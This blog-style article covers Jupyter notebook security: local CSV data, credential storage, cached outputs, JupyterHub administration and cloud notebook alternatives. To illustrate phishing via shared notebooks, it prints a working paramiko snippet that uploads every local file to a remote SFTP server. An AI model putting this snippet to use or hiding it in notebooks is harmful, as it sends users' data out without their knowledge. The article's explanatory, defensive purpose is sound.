1,248 reads

Working Securely with Jupyter

by Andy TateOctober 11th, 2023

Too Long; Didn't Read

Jupyter, the second most downloaded VS Code marketplace tool, is popular but poses security risks, especially when used locally. Storing data in CSV files on personal machines can breach data security standards like GDPR and expose data to attacks. JupyterHub offers a more secure alternative, but proper administration is essential. Using cloud-based alternatives like Deepnote, Google Colab, Hex, Amazon SageMaker, or Paperspace can enhance security by eliminating local data storage issues and providing better control over permissions and environments.

featured image - Working Securely with Jupyter

Did you know the second most downloaded VS Code marketplace tool is Jupyter? 40M+ as of last year. It can be used locally on anyone’s machine or it can be used in the cloud through apps like JupyterHub. Jupyter is a great iterative coding environment but it was built as an open source academic tool and there are a few security risks to mitigate to use it on sensitive company data.

Local Jupyter, Global Risk

Running Jupyter locally is the standard way of getting started. If you are a small team, you’re not going to want to deal with the headache of Docker and hosting, so everyone does pip install notebook or pip install jupyterlab.

Now you need data!

CSV risks

Many data analysts download their datasets by exporting huge CSVs containing every data point so they can just use csv.reader() or pandas.read_csv(). This makes analysis easier to access and keeps the data consistent.

Legal issues

Most companies, where using a notebook is helpful, adhere to standards set GDPR, CCPA, HIPAA, and PCI DSS, all of which have specific rules for data storage and handling–and those rules probably don’t have a subsection dedicated to storage and handling on ‘Dave’s macbook.’

So if you have a CSV or some other exported data on your local machine, then are you allowed to have it?

Attacks

Data stored locally is typically not encrypted. Personal computers do now come with encryption capabilities (BitLocker on Windows, FileVault on Mac), but these aren’t turned on by default. And if they weren’t, often they can’t then be added as an afterthought.

If a local computer lacks such encryption measures, it leaves the stored data vulnerable to a variety of threats – Malware, Ransomware, Theft, and Phishing.

That last one, phishing, is an interesting security quirk with Jupyter notebooks. For instance, if you’re collaborating with a colleague on a notebook, it’s not uncommon to just email the .ipynb files back and forth (of course, you can kinda use version control). So if you were to receive an email ostensibly from your coworker saying ‘check out this cool visualization I added!,’ a lot of people wouldn’t think twice about opening it and running it.

But the notebook could easily include the code below (maybe obfuscated across different cells and hidden in other code):

import os
import paramiko

ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh_client.connect(hostname=hostname, username=username, password=password)
sftp = ssh_client.open_sftp()
remote_directory_path = '/path/to/remote/directory'
for filename in os.listdir('.'):
  local_filepath = os.path.join('.', filename)
  if os.path.isfile(local_filepath):
    remote_filepath = os.path.join(remote_directory_path, filename)
    sftp.put(local_filepath, remote_filepath)

Congrats, you’ve just uploaded all your data to a random server. Is this going to happen? Unlikely, but possible. But the wider point is that, with sensitive data on your local computer, you immediately open yourself up to all types of attacks. Jupyter Notebooks will run any code. Though they do have some safeguards, the general idea is that you are the master of your domain–if you hit ‘Run all’, run all is what you get. ~~Buyer~~ Analyst beware.

Leaks

Data can also be unintentionally leaked from a machine by the user. Firstly, through the cloud. Just like a lot of OSes don’t have encryption turned on by default, they do have cloud syncing turned on. It might not be obvious to a user that everything in their Documents or Downloads folder is also being uploaded to cloud storage (which again might not have the requisite compliance guarantees). Or at one point many moons ago you synced your Code folder to Dropbox or GDrive as an Ersatz version control and now it holds all the company’s data.

But you can also leak it to your colleagues. If you are sharing notebook files, you’ll also have to share the data. Suddenly, your data isn’t just on your local computer. It’s sitting in your email, and your colleagues email. It’s sitting on your shared GDrive, or in GitHub. What was one copy you downloaded to make analysis a little easier, is now a dozen copies that are all in various states of unprotection dotted around the web.

To mitigate the risks with using CSV files for Jupyter Notebooks you should follow the standard corporate IT security training suggestions or connect directly to the database instead.

Database risks

Most analysts at a company will use database connectors such as snowflake-connector-python, psycopg2, or sqlalchemy to access their data. Accessing data this way means you don’t have to worry about the security of the local copy of data, or is vulnerability if the machine is compromised or stolen. You aren’t sharing the data files around so don’t have to worry about the copies.

But you do have to worry about two things:

Storing credentials

Now the data isn’t the problem, it is the access to the data. You have to have your credentials stored correctly. Correctly means not hardcoded into your Jupyter Notebook, which you are emailing to people. This can be a glaring security risk as it gives anyone who has access to your notebook the keys to access your data, including potentially sensitive or proprietary information.

Instead, you should use a secure method for managing your credentials. A simple and secure practice is to use environment variables. This involves storing your credentials in your system's environment and retrieving them in your notebook via os.getenv() function in Python. This way, you're not explicitly exposing your credentials in your code.

Here's a basic example:

import os

#Obtain credentials from environment variables

username = os.getenv('DB_USERNAME')
password = os.getenv('DB_PASSWORD')

For an even higher level of security, consider using a dedicated secrets management service. These services, like AWS Secrets Manager or HashiCorp Vault, securely store your sensitive data and provide programmatic access when needed, often through an API.

Cached data Jupyter does cache data in a number of ways, which could pose a security risk if not handled correctly.

The main form of caching in Jupyter notebooks comes in the form of output cells. When you run a cell in a Jupyter notebook, the results are displayed under the cell and stored in the notebook file itself. This can include dataframes, graphs, images, or any other output. If your notebook contains sensitive data in the output cells, and the notebook file is shared or stored insecurely, it can lead to exposure of that data.

For example, if you're querying sensitive data from a database, and then displaying that data directly in a Jupyter notebook, that data will be stored in the notebook file itself. This means you are open to all of the same security problems as with local data–if an attacker can access your notebook, they can access the data, or if you share the notebook, you are also sharing the saved data.

Mitigating Local Jupyter Risks

In terms of mitigating these security risks, it's a good practice to:

Clear the output cells containing sensitive data before sharing or storing your notebooks. This can be done from the menu: Cell -> All Output -> Clear
Regularly clear or secure your command history database.
Be mindful of how and where you're sharing or storing your Jupyter notebooks.
Consider using data masking or anonymizing techniques when working with sensitive data.

Remember, while these steps can significantly reduce the risk, no system can be completely secure.

Finally, NVIDIA released a Jupyter security extension, Jupysec, as the culmination of their own research into the problems with Jupyter security. It scans your Jupyter environment for possible security issues and will highlight them for you in the notebook.

This type of proactive security should become a feature of your data pipeline if you are working with Jupyer in any capacity.

But instead of having to actively manage the risk on your local machine, you could mitigate these risks by moving Jupyter into the cloud.

There is a non-local way to run Juptyer notebooks: JupyterHub

JupyterHub is a multi-user server that manages and provides Jupyter notebooks to a group of users. It is a centralized system that can serve Jupyter Notebook instances to multiple users, allowing them to work on interactive data science projects in their own personal workspace but on the same server.

JupyterHub is particularly useful in an environment where you need to distribute computational resources and environments among several users, such as in large collaborative projects on a data team at a company. With JupyterHub, you can spawn, manage, and proxy multiple instances of the single-user Jupyter Notebook server.

JupyterHub also includes:

Authentication: JupyterHub has a pluggable authentication mechanism. It can be configured to use various authentication protocols, enabling integration with a broad range of identity providers like OAuth, LDAP, etc.
Containerization: JupyterHub is often used with Docker to provide each user with their own isolated environment. Other container or virtual environment technologies like Kubernetes can also be used.
Role-Based Access Control (RBAC): JupyterHub supports Role-Based Access Control, providing a fine-grained control system for defining user roles and assigning specific permissions to those roles.

RBAC, in particular, is an important feature that enables administrators to control who has access to what within JupyterHub. For instance, some users can be assigned the role of an 'admin' to manage the service, while others could be 'users' with access to their individual notebooks only. This capability helps enhance the security of JupyterHub and prevents unauthorized access to sensitive resources. It's particularly useful in large, collaborative environments where different levels of permissions and access rights need to be assigned.

BUT, there’s a problem word in that previous paragraph–’administrators.’

Moving to JupyterHub is more secure if you administer the instance properly. However, effective administration of a JupyterHub instance is not a trivial task and requires a solid understanding of security principles, the JupyterHub system itself, and its associated technologies. A poorly administered JupyterHub instance can be just as risky, if not more, than individual Jupyter notebooks with lax security practices.

Setting up the server, managing user permissions, ensuring that the system is regularly updated to patch any security vulnerabilities, monitoring for any suspicious activity, and responding to potential security incidents are all responsibilities that fall on the administrators. Ineffectively performing these duties could lead to a variety of risks, from data leakage to unauthorized access, to potential misuse of computational resources.

Furthermore, the "human factor" also plays a significant role. Even the most secure systems can be compromised due to human error. Administrators, like all users, can make mistakes–they can accidentally grant excessive permissions to a user, overlook important security updates, or misconfigure security settings. Especially if those ‘administrators’ are actually just data leads. Effectively, moving to JupyterHub means that data lead on the team becomes more like DevOps, supporting the admin side of deploying the instance rather than working on the data.

Secure Cloud Notebooks

You can run Jupyter notebooks securely–it just takes a lot of effort. If you are a large team, you probably need someone dedicated to this, and you’ll need a codified process that’s incorporated into your training so everyone knows how to use Jupyter securely.

But there are alternatives–cloud notebooks.

	Risk	Mitigation
Jupyter with CSV data	Data is stored or replicated in a non secure place	Connect directly to a database
Jupyter with Database data	Credentials may be stored in a non secure place or sensitive data may be cached and accessed	Use Jupyter in the cloud
Cloud Jupyter	Permissions and environments are not properly set up so people have improper access and try to move data into other environments.	Use Cloud notebooks

By leveraging cloud notebooks, teams can focus more on deriving insights from their data and less on navigating the complexities of securing Jupyter notebooks.

Some options for analysts are:

Deepnote

Deepnote is a unique cloud notebook designed to offer a seamless and interactive experience for data scientists and engineers working in Python. This platform offers real-time collaboration, enabling multiple users to work on the same notebook concurrently. One of its strengths is the intuitive and user-friendly interface, which makes it easier for users to develop, run, and share their code. Deepnote integrates effortlessly with various data sources and tools, promoting accessibility and versatility.

For security, Deepnote offers encrypted connections, ensuring data sent and received is protected from unwanted eyes. It also provides a robust permission system, allowing team leaders to dictate who can view or edit specific projects.

Its smart features, like variable explorer and auto visualizations, help elevate overall productivity, making it a go-to choice for professionals in the field of data science.

Google Colab

Google Colab is a widely recognized and utilized cloud notebook service provided by Google. It enables users to write and execute Python code in a web browser with zero configuration, free GPU access, and easy sharing. Colab is well-regarded for its ease of use, accessibility, and integration with Google Drive and other Google services.

It's deeply integrated with Google Drive, allowing easy sharing and collaboration within familiar Google environments. Security is bolstered by Google's robust infrastructure, which encrypts data both in transit and at rest. Given that it's a Google product, users benefit from the same security measures applied across Google services. For teams operating in a Google-based ecosystem, Google Colab presents an accessible and secure environment for notebook execution, especially when budget constraints are in play.

It supports various machine learning libraries and frameworks, making it an ideal environment for machine learning and data analysis projects. The provision of free resources and the user-friendly interface have contributed to its immense popularity among educators, researchers, and developers.

Hex

Hex offers a centralized platform where you can conduct your data analysis, visualize the results, and even create interactive data apps–all while maintaining high levels of security. This eliminates the risk of unencrypted data exposure and unauthorized access that may occur when notebooks are distributed across local machines.

Hex ensures that all data sent and received are encrypted, mitigating the risk of data interception. And perhaps one of the most appealing security features of Hex is its ephemeral nature. After a user session ends, no residual data is left on the servers, minimizing the risks associated with data at rest. Hex also simplifies the access control process. Instead of each analyst managing their own set of credentials to connect to databases or APIs, Hex provides an interface where your team can centrally control and monitor who has access to what data.

Lastly, Hex is HIPAA and SOC2-compliant, meaning it adheres to some of the strictest standards when it comes to protecting sensitive and personal information. This makes it an attractive option, especially for businesses operating in industries like healthcare or finance where data security is paramount.

Amazon SageMaker

Amazon SageMaker is a fully managed service that provides developers and data scientists the ability to build, train, and deploy machine learning models quickly. It is highly scalable and flexible, allowing users to create Jupyter notebooks for easy data exploration and analysis. SageMaker stands out due to its wide array of features, including built-in algorithms, model tuning, and high-performance runtime for inference.

Security is at its core, given that it's a part of the AWS suite. All data is encrypted in transit and at rest in the SageMaker environment. With fine-grained access controls, businesses can stipulate who can access specific datasets, notebooks, or model artifacts. Its integration with AWS Key Management Service (KMS) also means that users can create and control their encryption keys. Furthermore, SageMaker complies with key certifications such as HIPAA, making it a go-to for industries that demand high levels of data protection.

SageMaker is particularly beneficial for enterprises and professionals looking to deploy robust and efficient machine-learning solutions.

Paperspace

Paperspace is a high-performance cloud computing platform that focuses on developing machine learning, data science, and other compute-intensive projects. It offers Gradient, a cloud notebook platform aimed at enabling collaboration and development in machine learning and deep learning. Paperspace provides powerful GPU-backed machines, making it suitable for training complex models.

Safety and security are given top priority, with all data transmissions secured via SSL/TLS encryption. Their cloud infrastructure ensures that data at rest is also encrypted, guarding against potential breaches. With its team-focused features, Paperspace allows admins to easily manage access controls, ensuring only authorized personnel have access to critical datasets or models. Furthermore, its snapshot feature means that your work can be easily backed up, adding another layer of data security.

The platform is appreciated for its versatility, allowing users to run different types of environments and supporting various machine learning frameworks. Its scalable infrastructure and advanced features make it an attractive option for professionals working on demanding computational tasks.

Whichever you choose, it's essential that all users remain aware of security best practices, as technology can only mitigate, not eliminate, security risks.